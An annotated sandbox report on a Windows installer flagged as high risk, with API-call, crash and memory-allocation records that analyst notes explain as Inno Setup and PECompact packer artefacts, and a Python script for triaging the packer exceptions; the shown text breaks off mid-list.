Score: 6.8
Verdict: High risk

SHA256: 749734fc1c4dedf0ebd086848ca91aafbdc90366e87d1ad9babb9820ab59bfc0

File name: d9b4cd775a5c49cc3b6a04f71fcb5938.exe

Analysis duration: 114s

Last analysis:

File size: 1.6MB
Static detection name: (none)   Dynamic detection name: ELDORADO
Hawkeye (鹰眼) engine: not detected (no Hawkeye engine result available)
Static verdict
Antivirus engines
Engine        Result   Scan date    Engine version
McAfee        -        2019-05-27   6.0.6.653
Alibaba       -        2019-05-13   0.3.0.4
Baidu         -        2019-03-18   1.0.0.2
Avast         -        2019-05-27   18.4.3895.0
Tencent       -        2019-05-27   1.0.0.1
Kingsoft      -        2019-05-27   2013.8.14.323
CrowdStrike   -        2019-02-12   1.0
No engine in the static table recorded a detection name. The ELDORADO name in the page header comes from the single F-Prot heuristic hit listed under the dynamic indicators below.
Static indicators
Queries for the computername (1 event)
Time & API Arguments Status Return Repeated
1621007387.028876
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
Checks if process is being debugged by a debugger (1 event)
A single IsDebuggerPresent call that returns 0 is weak evidence of anti-analysis on its own; runtime libraries make the same call routinely.
Time & API Arguments Status Return Repeated
1621007382.013999
IsDebuggerPresent
failed 0 0
The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 events)
section CODE
section DATA
section BSS
CODE, DATA and BSS are the default section names of the Borland/Delphi linker, and the is-T9ON8.tmp and is-EB9J7.tmp directories, the _isetup\_shfoldr.dll and _RegDLL.tmp helpers and the {GUID}_is1 uninstall key in the dynamic indicators below are all Inno Setup artefacts (Inno Setup itself is written in Delphi). This indicator is therefore the expected false positive for an Inno Setup installer stub rather than evidence that the stub is packed. The packer-style behaviour in this analysis comes from the OCX components the installer registers: the faulting-instruction bytes in the crash records spell out the string PECompact2.
One or more processes crashed (10 events)
Every record here has the same shape: the faulting instruction is mov dword ptr [eax], ecx with eax = 0 (a write to address 0, exception code 0xc0000005), and the bytes the sandbox dumped after it, 50 45 43 6f 6d 70 61 63 74 32 00, are the ASCII string PECompact2. That is the entry stub of the PECompact 2 packer, which raises this access violation on purpose and catches it with its own SEH handler before decompressing the module, so these are handled exceptions rather than crashes: the regsvr32 instance that registers webrec.ocx (PID 2144 in the RWX allocation list below) raises seven of them between 1621007430.6 and 1621007431.4, one per packed module it loads, and keeps running. Two caveats when reading the traces: exception.symbol names the nearest export (DllCanUnloadNow, HI_GetVersion, plugin_info) rather than the function that faulted, and the New_ntdll_*, hook_*, monitor_hook and log_init frames belong to the sandbox's in-process monitor, not to the sample.
Time & API Arguments Status Return Repeated
1621007392.977938
__exception__
stacktrace:
LdrResSearchResource+0xb4d LdrResFindResourceDirectory-0x16c ntdll+0x3d8a9 @ 0x77d6d8a9
LdrResSearchResource+0xa10 LdrResFindResourceDirectory-0x2a9 ntdll+0x3d76c @ 0x77d6d76c
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x7519d4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
regsvr32+0x20ff @ 0xea20ff
regsvr32+0x2669 @ 0xea2669
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 2943192
registers.edi: 2943404
registers.eax: 0
registers.ebp: 2943228
registers.edx: 32
registers.ebx: 1
registers.esi: 2943216
registers.ecx: 2943368
exception.instruction_r: 89 08 50 45 43 6f 6d 70 61 63 74 32 00 00 00 00
exception.instruction: mov dword ptr [eax], ecx
exception.exception_code: 0xc0000005
exception.symbol: DllCanUnloadNow+0x5c814 dhdeviceconfig+0xd1088
exception.address: 0x100d1088
success 0 0
1621007414.271069
__exception__
stacktrace:
LdrResSearchResource+0xb4d LdrResFindResourceDirectory-0x16c ntdll+0x3d8a9 @ 0x77d6d8a9
LdrResSearchResource+0xa10 LdrResFindResourceDirectory-0x2a9 ntdll+0x3d76c @ 0x77d6d76c
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x7519d4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
regsvr32+0x20ff @ 0x5320ff
regsvr32+0x2669 @ 0x532669
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 714268
registers.edi: 714480
registers.eax: 0
registers.ebp: 714304
registers.edx: 32
registers.ebx: 1
registers.esi: 714292
registers.ecx: 714444
exception.instruction_r: 89 08 50 45 43 6f 6d 70 61 63 74 32 00 08 e1 48
exception.instruction: mov dword ptr [eax], ecx
exception.exception_code: 0xc0000005
exception.symbol: DllCanUnloadNow+0x3d933 dvrintervideo+0x74787
exception.address: 0x10074787
success 0 0
1621007421.690079
__exception__
stacktrace:
LdrResSearchResource+0xb4d LdrResFindResourceDirectory-0x16c ntdll+0x3d8a9 @ 0x77d6d8a9
LdrResSearchResource+0xa10 LdrResFindResourceDirectory-0x2a9 ntdll+0x3d76c @ 0x77d6d76c
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x7519d4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
regsvr32+0x20ff @ 0x9c20ff
regsvr32+0x2669 @ 0x9c2669
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 2746552
registers.edi: 2746764
registers.eax: 0
registers.ebp: 2746588
registers.edx: 32
registers.ebx: 1
registers.esi: 2746576
registers.ecx: 2746728
exception.instruction_r: 89 08 50 45 43 6f 6d 70 61 63 74 32 00 08 e1 48
exception.instruction: mov dword ptr [eax], ecx
exception.exception_code: 0xc0000005
exception.symbol: DllCanUnloadNow+0x30011 videowindow+0x4bb03
exception.address: 0x1004bb03
success 0 0
1621007430.60259
__exception__
stacktrace:
LdrResSearchResource+0xb4d LdrResFindResourceDirectory-0x16c ntdll+0x3d8a9 @ 0x77d6d8a9
_vsnwprintf+0x63c RtlInitializeHandleTable-0x10 ntdll+0x4f5cf @ 0x77d7f5cf
LdrGetProcedureAddress+0x18 LdrGetProcedureAddressEx-0x9 ntdll+0x301c2 @ 0x77d601c2
New_ntdll_LdrGetProcedureAddress@16+0x59 New_ntdll_LdrLoadDll@16-0xfb @ 0x7519d359
GetProcAddress+0x44 GetVersion-0x38 kernelbase+0x111c4 @ 0x778f11c4
SE_ProcessDying+0xce ApphelpCheckExe-0x5d02 apphelp+0x1008b @ 0x750c008b
SE_ProcessDying+0x64 ApphelpCheckExe-0x5d6c apphelp+0x10021 @ 0x750c0021
hook+0x173 hook_get_mem-0x33a @ 0x75184e8e
monitor_hook+0x5d monitor_unhook-0x1c @ 0x7518162d
hook_library+0x1a unhook_library-0x3 @ 0x7518c6b9
log_init+0x1ce hook_init-0x5 @ 0x75183c00
RtlUnlockModuleSection+0x591 RtlQueryAtomInAtomTable-0x164 ntdll+0x676b8 @ 0x77d976b8
LdrLoadDll+0x310 _strcmpi-0x6f ntdll+0x3c74a @ 0x77d6c74a
RtlEncodeSystemPointer+0x222 RtlFindClearBits-0x56f ntdll+0x3e27a @ 0x77d6e27a
RtlSetBits+0xea RtlFlsAlloc-0x89 ntdll+0x3e9da @ 0x77d6e9da
RtlSetBits+0x162 RtlFlsAlloc-0x11 ntdll+0x3ea52 @ 0x77d6ea52
RtlSetBits+0x5d RtlFlsAlloc-0x116 ntdll+0x3e94d @ 0x77d6e94d
RtlInitializeSid+0x35 RtlEncodePointer-0x3c ntdll+0x40f8f @ 0x77d70f8f
RtlSetBits+0xea RtlFlsAlloc-0x89 ntdll+0x3e9da @ 0x77d6e9da
RtlSetBits+0x162 RtlFlsAlloc-0x11 ntdll+0x3ea52 @ 0x77d6ea52
RtlSetBits+0x5d RtlFlsAlloc-0x116 ntdll+0x3e94d @ 0x77d6e94d
LdrResSearchResource+0x943 LdrResFindResourceDirectory-0x376 ntdll+0x3d69f @ 0x77d6d69f
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x7519d4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
regsvr32+0x20ff @ 0x8020ff
regsvr32+0x2669 @ 0x802669
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 973268
registers.edi: 973480
registers.eax: 0
registers.ebp: 973304
registers.edx: 32
registers.ebx: 1
registers.esi: 973292
registers.ecx: 973444
exception.instruction_r: 89 08 50 45 43 6f 6d 70 61 63 74 32 00 4c 06 89
exception.instruction: mov dword ptr [eax], ecx
exception.exception_code: 0xc0000005
exception.symbol: HI_GetVersion+0x352 dlldeinterlace+0x1bc2
exception.address: 0x7c1bc2
success 0 0
1621007430.60259
__exception__
stacktrace:
LdrResSearchResource+0xb4d LdrResFindResourceDirectory-0x16c ntdll+0x3d8a9 @ 0x77d6d8a9
_vsnwprintf+0x63c RtlInitializeHandleTable-0x10 ntdll+0x4f5cf @ 0x77d7f5cf
LdrGetProcedureAddress+0x18 LdrGetProcedureAddressEx-0x9 ntdll+0x301c2 @ 0x77d601c2
New_ntdll_LdrGetProcedureAddress@16+0x59 New_ntdll_LdrLoadDll@16-0xfb @ 0x7519d359
GetProcAddress+0x44 GetVersion-0x38 kernelbase+0x111c4 @ 0x778f11c4
SE_ProcessDying+0xce ApphelpCheckExe-0x5d02 apphelp+0x1008b @ 0x750c008b
SE_ProcessDying+0x64 ApphelpCheckExe-0x5d6c apphelp+0x10021 @ 0x750c0021
hook+0x173 hook_get_mem-0x33a @ 0x75184e8e
monitor_hook+0x5d monitor_unhook-0x1c @ 0x7518162d
hook_library+0x1a unhook_library-0x3 @ 0x7518c6b9
log_init+0x1ce hook_init-0x5 @ 0x75183c00
RtlUnlockModuleSection+0x591 RtlQueryAtomInAtomTable-0x164 ntdll+0x676b8 @ 0x77d976b8
LdrLoadDll+0x310 _strcmpi-0x6f ntdll+0x3c74a @ 0x77d6c74a
RtlEncodeSystemPointer+0x222 RtlFindClearBits-0x56f ntdll+0x3e27a @ 0x77d6e27a
RtlSetBits+0xea RtlFlsAlloc-0x89 ntdll+0x3e9da @ 0x77d6e9da
RtlSetBits+0x162 RtlFlsAlloc-0x11 ntdll+0x3ea52 @ 0x77d6ea52
RtlSetBits+0x5d RtlFlsAlloc-0x116 ntdll+0x3e94d @ 0x77d6e94d
RtlInitializeSid+0x35 RtlEncodePointer-0x3c ntdll+0x40f8f @ 0x77d70f8f
RtlSetBits+0xea RtlFlsAlloc-0x89 ntdll+0x3e9da @ 0x77d6e9da
RtlSetBits+0x162 RtlFlsAlloc-0x11 ntdll+0x3ea52 @ 0x77d6ea52
RtlSetBits+0x5d RtlFlsAlloc-0x116 ntdll+0x3e94d @ 0x77d6e94d
LdrResSearchResource+0x943 LdrResFindResourceDirectory-0x376 ntdll+0x3d69f @ 0x77d6d69f
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x7519d4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
regsvr32+0x20ff @ 0x8020ff
regsvr32+0x2669 @ 0x802669
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 973268
registers.edi: 973480
registers.eax: 0
registers.ebp: 973304
registers.edx: 32
registers.ebx: 1
registers.esi: 973292
registers.ecx: 973444
exception.instruction_r: 89 08 50 45 43 6f 6d 70 61 63 74 32 00 08 e1 48
exception.instruction: mov dword ptr [eax], ecx
exception.exception_code: 0xc0000005
exception.symbol: HI_VOICE_DecodeFrame+0x51783 dhplay+0x7f6f3
exception.address: 0x7af6f3
success 0 0
1621007431.00959
__exception__
stacktrace:
LdrResSearchResource+0xb4d LdrResFindResourceDirectory-0x16c ntdll+0x3d8a9 @ 0x77d6d8a9
LdrResSearchResource+0xa10 LdrResFindResourceDirectory-0x2a9 ntdll+0x3d76c @ 0x77d6d76c
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x7519d4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
regsvr32+0x20ff @ 0x8020ff
regsvr32+0x2669 @ 0x802669
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 976700
registers.edi: 976912
registers.eax: 0
registers.ebp: 976736
registers.edx: 32
registers.ebx: 1
registers.esi: 976724
registers.ecx: 976876
exception.instruction_r: 89 08 50 45 43 6f 6d 70 61 63 74 32 00 88 78 73
exception.instruction: mov dword ptr [eax], ecx
exception.exception_code: 0xc0000005
exception.symbol: _VMS_DownloadByRecordFile@20+0xa695 dhvms+0xd5ba
exception.address: 0x5fd5ba
success 0 0
1621007431.10259
__exception__
stacktrace:
LdrResSearchResource+0xb4d LdrResFindResourceDirectory-0x16c ntdll+0x3d8a9 @ 0x77d6d8a9
LdrResSearchResource+0xa10 LdrResFindResourceDirectory-0x2a9 ntdll+0x3d76c @ 0x77d6d76c
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x7519d4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
regsvr32+0x20ff @ 0x8020ff
regsvr32+0x2669 @ 0x802669
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 976700
registers.edi: 976912
registers.eax: 0
registers.ebp: 976736
registers.edx: 32
registers.ebx: 1
registers.esi: 976724
registers.ecx: 976876
exception.instruction_r: 89 08 50 45 43 6f 6d 70 61 63 74 32 00 00 00 08
exception.instruction: mov dword ptr [eax], ecx
exception.exception_code: 0xc0000005
exception.symbol: plugin_info+0x7361 dhdvr+0x2a531
exception.address: 0x224a531
success 0 0
1621007431.14959
__exception__
stacktrace:
LdrResSearchResource+0xb4d LdrResFindResourceDirectory-0x16c ntdll+0x3d8a9 @ 0x77d6d8a9
LdrResSearchResource+0xa10 LdrResFindResourceDirectory-0x2a9 ntdll+0x3d76c @ 0x77d6d76c
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x7519d4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
regsvr32+0x20ff @ 0x8020ff
regsvr32+0x2669 @ 0x802669
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 976700
registers.edi: 976912
registers.eax: 0
registers.ebp: 976736
registers.edx: 32
registers.ebx: 1
registers.esi: 976724
registers.ecx: 976876
exception.instruction_r: 89 08 50 45 43 6f 6d 70 61 63 74 32 00 00 00 08
exception.instruction: mov dword ptr [eax], ecx
exception.exception_code: 0xc0000005
exception.symbol: AMR_Encode_Frame+0x3cf4d dhnetsdk+0x97e3d
exception.address: 0x2e57e3d
success 0 0
1621007431.35259
__exception__
stacktrace:
LdrResSearchResource+0xb4d LdrResFindResourceDirectory-0x16c ntdll+0x3d8a9 @ 0x77d6d8a9
LdrResSearchResource+0xa10 LdrResFindResourceDirectory-0x2a9 ntdll+0x3d76c @ 0x77d6d76c
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x7519d4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
regsvr32+0x20ff @ 0x8020ff
regsvr32+0x2669 @ 0x802669
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 976700
registers.edi: 976912
registers.eax: 0
registers.ebp: 976736
registers.edx: 32
registers.ebx: 1
registers.esi: 976724
registers.ecx: 976876
exception.instruction_r: 89 08 50 45 43 6f 6d 70 61 63 74 32 00 00 00 00
exception.instruction: mov dword ptr [eax], ecx
exception.exception_code: 0xc0000005
exception.symbol: _WEB_CLIENT_PacketRpcRequest@20+0x1f6cc webjsonsdk+0x5a5cc
exception.address: 0x2c8a5cc
success 0 0
1621007431.44659
__exception__
stacktrace:
LdrResSearchResource+0xb4d LdrResFindResourceDirectory-0x16c ntdll+0x3d8a9 @ 0x77d6d8a9
LdrResSearchResource+0xa10 LdrResFindResourceDirectory-0x2a9 ntdll+0x3d76c @ 0x77d6d76c
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x77d6c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x7519d4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x778f1d2a
regsvr32+0x20ff @ 0x8020ff
regsvr32+0x2669 @ 0x802669
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 976700
registers.edi: 976912
registers.eax: 0
registers.ebp: 976736
registers.edx: 32
registers.ebx: 1
registers.esi: 976724
registers.ecx: 976876
exception.instruction_r: 89 08 50 45 43 6f 6d 70 61 63 74 32 00 00 00 08
exception.instruction: mov dword ptr [eax], ecx
exception.exception_code: 0xc0000005
exception.symbol: DllCanUnloadNow+0x30433 webrec+0x66ae9
exception.address: 0x10066ae9
success 0 0
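The crash records above can be triaged mechanically: parse each __exception__ block, decode the dumped instruction bytes, and separate a packer's self-inflicted, self-handled null write from a genuine fault. The script below is an added example, not part of the sandbox report or its tooling. It assumes that the PECompact 2 loader stub begins with a write to address 0 that the stub's own SEH handler catches and that the stub is followed by the literal string "PECompact2"; the excerpt it parses is constructed in the report's own key/value layout (the first two records are copied from the report, the third, with module name "hypothetical", is made up so the contrast is visible).

```python
"""Triage sandbox __exception__ records: packer stub or real crash?"""
import re
from dataclasses import dataclass

PECOMPACT_MARKER = b"PECompact2\x00"   # assumption: marker string after the PECompact 2 stub
STATUS_ACCESS_VIOLATION = 0xC0000005

# Constructed excerpt in the report's layout (third record is hypothetical).
REPORT_EXCERPT = """\
1621007392.977938
__exception__
registers.eax: 0
registers.ecx: 2943368
exception.instruction_r: 89 08 50 45 43 6f 6d 70 61 63 74 32 00 00 00 00
exception.instruction: mov dword ptr [eax], ecx
exception.exception_code: 0xc0000005
exception.symbol: DllCanUnloadNow+0x5c814 dhdeviceconfig+0xd1088
exception.address: 0x100d1088
1621007430.60259
__exception__
registers.eax: 0
registers.ecx: 973444
exception.instruction_r: 89 08 50 45 43 6f 6d 70 61 63 74 32 00 4c 06 89
exception.instruction: mov dword ptr [eax], ecx
exception.exception_code: 0xc0000005
exception.symbol: HI_GetVersion+0x352 dlldeinterlace+0x1bc2
exception.address: 0x7c1bc2
1621007440.000000
__exception__
registers.eax: 305419896
registers.ecx: 1
exception.instruction_r: 8b 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90
exception.instruction: mov eax, dword ptr [eax]
exception.exception_code: 0xc0000005
exception.symbol: SomeExport+0x10 hypothetical+0x1000
exception.address: 0x401000
"""


@dataclass
class ExceptionEvent:
    timestamp: float
    module: str
    address: int
    code: int
    eax: int
    instruction: str
    raw: bytes  # the 16 bytes the sandbox dumped at the faulting address


def parse_exception_events(text: str) -> list[ExceptionEvent]:
    """One record per '<timestamp>\\n__exception__' pair; stack-trace lines carry no ': ' and are skipped."""
    lines = text.splitlines()
    records: list[dict] = []
    for i, line in enumerate(lines):
        if re.fullmatch(r"\d+\.\d+", line) and i + 1 < len(lines) and lines[i + 1] == "__exception__":
            records.append({"timestamp": float(line)})
        elif records and ": " in line:
            key, _, value = line.partition(": ")
            records[-1][key] = value
    events = []
    for r in records:
        # "Export+0x.. module+0x.." -> module is the last token's prefix
        module = r["exception.symbol"].split()[-1].split("+")[0]
        events.append(ExceptionEvent(
            timestamp=r["timestamp"],
            module=module,
            address=int(r["exception.address"], 16),
            code=int(r["exception.exception_code"], 16),
            eax=int(r["registers.eax"]),
            instruction=r["exception.instruction"],
            raw=bytes.fromhex(r["exception.instruction_r"]),
        ))
    return events


def trailing_ascii(raw: bytes, skip: int = 2) -> str:
    """Printable ASCII run that follows the two-byte 'mov [eax], ecx' encoding (89 08)."""
    out = []
    for b in raw[skip:]:
        if 0x20 <= b < 0x7F:
            out.append(chr(b))
        else:
            break
    return "".join(out)


def classify(ev: ExceptionEvent) -> str:
    if ev.code != STATUS_ACCESS_VIOLATION:
        return "other"
    null_write = ev.eax == 0 and ev.instruction.startswith("mov dword ptr [eax]")
    if null_write and PECOMPACT_MARKER in ev.raw:
        return "packer-stub"        # deliberate fault, caught by the stub's SEH handler
    if null_write:
        return "null-write"         # deliberate-looking, but no known marker
    return "access-violation"       # treat as a real fault until proven otherwise


def triage(text: str) -> dict[str, str]:
    return {ev.module: classify(ev) for ev in parse_exception_events(text)}


if __name__ == "__main__":
    for ev in parse_exception_events(REPORT_EXCERPT):
        print(f"{ev.module:16} {ev.address:#010x} {classify(ev):17} {trailing_ascii(ev.raw)!r}")
```

Run against the full crash section of this report, the parser skips the stacktrace lines (they contain no ": ") and returns all ten records as packer-stub; only a record with a non-zero eax, a read instruction or no marker would surface as something worth opening in a debugger.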
Behavioral verdict
Dynamic indicators
HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)
suspicious_features: POST method with no referer header
suspicious_request: POST https://update.googleapis.com/service/update2?cup2key=10:3222843704&cup2hreq=173397a1193dbedb66eed3d48bb74045fa488a358c275ad3167d9bfe2b28fe0f
Performs some HTTP requests (1 event)
request POST https://update.googleapis.com/service/update2?cup2key=10:3222843704&cup2hreq=173397a1193dbedb66eed3d48bb74045fa488a358c275ad3167d9bfe2b28fe0f
Sends data using the HTTP POST Method (1 event)
request POST https://update.googleapis.com/service/update2?cup2key=10:3222843704&cup2hreq=173397a1193dbedb66eed3d48bb74045fa488a358c275ad3167d9bfe2b28fe0f
All three indicators describe the same single POST to update.googleapis.com/service/update2. The cup2key and cup2hreq parameters belong to Google's Client Update Protocol, i.e. this is the guest's own Google updater checking in over TLS (192.168.56.101 to 203.208.41.98:443 in the TCP table below). Nothing on this page ties that connection to the sample, so treat it, together with the DNS, NTP, LLMNR and NetBIOS traffic listed further down, as sandbox background noise rather than command-and-control.
Allocates read-write-execute memory (usually to unpack itself) (36 events)
The first three entries (PID 2216) cover the installer executable's own image pages at 0x00400000 to 0x0040f000 (its import table sits at 0x40d0c4). In the regsvr32 processes the NtProtectVirtualMemory calls make the page holding each module's PECompact stub writable and executable (0x1004b000 contains the fault address 0x1004bb03 in videowindow; 0x02e57000, 0x0224a000 and 0x02c8a000 contain the fault addresses in dhnetsdk, dhdvr and webjsonsdk), and the MEM_COMMIT allocations of 140 KiB to 800 KiB that follow each fault are consistent with the unpacker's output buffers.
Time & API Arguments Status Return Repeated
1621007381.731999
NtProtectVirtualMemory
process_identifier: 2216
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00400000
success 0 0
1621007381.731999
NtProtectVirtualMemory
process_identifier: 2216
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 40960
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x00401000
success 0 0
1621007381.731999
NtProtectVirtualMemory
process_identifier: 2216
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 20480
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x0040f000
success 0 0
1621007382.903876
NtAllocateVirtualMemory
process_identifier: 196
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003e0000
success 0 0
1621007392.977938
NtProtectVirtualMemory
process_identifier: 2632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x77531000
success 0 0
1621007392.977938
NtProtectVirtualMemory
process_identifier: 2632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x75a01000
success 0 0
1621007392.977938
NtAllocateVirtualMemory
process_identifier: 2632
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x004d0000
success 0 0
1621007392.992938
NtAllocateVirtualMemory
process_identifier: 2632
region_size: 819200
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02b00000
success 0 0
1621007414.271069
NtProtectVirtualMemory
process_identifier: 2656
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x77531000
success 0 0
1621007414.271069
NtProtectVirtualMemory
process_identifier: 2656
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x75a01000
success 0 0
1621007414.271069
NtAllocateVirtualMemory
process_identifier: 2656
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00500000
success 0 0
1621007414.271069
NtAllocateVirtualMemory
process_identifier: 2656
region_size: 442368
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x00540000
